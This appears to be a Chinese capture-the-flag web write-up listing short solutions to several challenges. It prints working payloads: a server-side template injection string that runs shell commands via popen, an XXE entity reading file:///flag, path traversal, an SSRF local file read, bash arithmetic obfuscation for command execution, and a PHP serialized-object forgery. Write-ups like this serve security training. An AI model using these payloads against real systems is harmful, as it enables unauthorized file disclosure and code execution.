浏览器也能套娃?
随便试一试,一眼ssrf
file:///flag直接读本地文件
一个....池子?
{{7*7}}测出SSTI
随便找个payload打了
{{x.init.globals['builtins']'eval'.popen('tac /f*').read()")}}
高亮主题(划掉)背景查看器
一眼文件包含漏洞
../../../../flag
目录穿越拿到flag
百万美元的诱惑
?a[]=1&b[]=2&c=2025.a
过了php八股
访问./dollar.php
参考ctfshow web57
【Web】CTFSHOW PHP命令执行刷题记录(全)_ctfweb解题 php-CSDN博客
0=$(())
12=$((~$((-13))))
-13=$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))
12=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))
SAS - Serializing Authentication
傻瓜题
<?php
class User {
public $username;
public $password;
}
$user=new User();
$user->username='admin';
$user->password='secure_password';
echo base64_encode(serialize($user));
?>
exx
以xml形式传数据,打xxe
直接读文件
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>admin</password></user>
版权归原作者 Z3r4y 所有, 如有侵权,请联系我们删除。